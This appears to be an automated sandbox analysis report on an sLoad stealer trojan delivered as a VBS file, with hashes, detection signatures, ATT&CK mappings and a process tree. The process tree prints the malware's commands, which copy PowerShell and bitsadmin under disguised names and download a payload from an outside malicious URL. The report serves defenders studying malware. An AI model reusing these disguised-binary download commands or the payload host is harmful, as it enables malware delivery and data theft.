sload | a21313d83fb43f4bcdaa0b2cbe350bb511dd52a7ebd81690dfa62c7e027a70ac

Analysis

max time kernel
45s
max time network
55s
platform
windows7_x64
resource
win7-20220414-en
submitted
20-05-2022 15:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FattDiffEmessa2020 03799870369/FattDiffEmessa2020 03799870369.vbs
Size

3KB
MD5

ba1697038db097aae963962a1fd5dd15
SHA1

46e3f1b7e3c93f3de52d63a1afb3b6f6c17180b8
SHA256

79b59d0b510fb8855ee624fd51b46c2b4f1cccef9294860f9864f00183b07e2c
SHA512

d45c7b86124b760381e36eeb301c2fba631e38b3ba537187ca059238eb2692531dda9efaa0ed0806c2530794b9fcd4f70e872ff6da2984d31ea812e6e177fb64

Score

10^/10

sload stealer trojan

Malware Config

Signatures

sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
trojan stealer sload

Executes dropped EXE 1 IoCs

pid	Process
2004	DrBqNtd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1336 wrote to memory of 1712	1336	WScript.exe	28
PID 1336 wrote to memory of 1712	1336	WScript.exe	28
PID 1336 wrote to memory of 1712	1336	WScript.exe	28
PID 1336 wrote to memory of 2028	1336	WScript.exe	30
PID 1336 wrote to memory of 2028	1336	WScript.exe	30
PID 1336 wrote to memory of 2028	1336	WScript.exe	30
PID 1336 wrote to memory of 2004	1336	WScript.exe	32
PID 1336 wrote to memory of 2004	1336	WScript.exe	32
PID 1336 wrote to memory of 2004	1336	WScript.exe	32
PID 1336 wrote to memory of 2004	1336	WScript.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FattDiffEmessa2020 03799870369\FattDiffEmessa2020 03799870369.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1336
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe
  2⤵
  PID:1712
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
  2⤵
  PID:2028
- C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
  "C:\Users\Admin\AppData\Roaming\DrBqNtd.exe" /transfer bHybPh /download https://ndjambo.com/jaluma/03799870369/it.gif C:\Users\Admin\AppData\Roaming\it.gif
  2⤵
  - Executes dropped EXE
  PID:2004

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\DrBqNtd.exe

Filesize
182KB

MD5
0920b14aa67a8b04acf48ffe7c6f0927

SHA1
3421124253058dc21453ebac531b67aeb999f627

SHA256
838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00

SHA512
2b0a9800736cb27316be5e376842bce59ce08089046aaef930da837eb59d1c084106ce447320346911c6fa3c8a32e4e41209b12bb868ac2cd9848d69a9adbe51

Download Submit
C:\Users\Admin\AppData\Roaming\DrBqNtd.exe

Filesize
182KB

MD5
0920b14aa67a8b04acf48ffe7c6f0927

SHA1
3421124253058dc21453ebac531b67aeb999f627

SHA256
838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00

SHA512
2b0a9800736cb27316be5e376842bce59ce08089046aaef930da837eb59d1c084106ce447320346911c6fa3c8a32e4e41209b12bb868ac2cd9848d69a9adbe51

Download Submit
memory/1336-54-0x000007FEFBDA1000-0x000007FEFBDA3000-memory.dmp

Filesize
8KB

Download
memory/2004-60-0x00000000753B1000-0x00000000753B3000-memory.dmp

Filesize
8KB

Download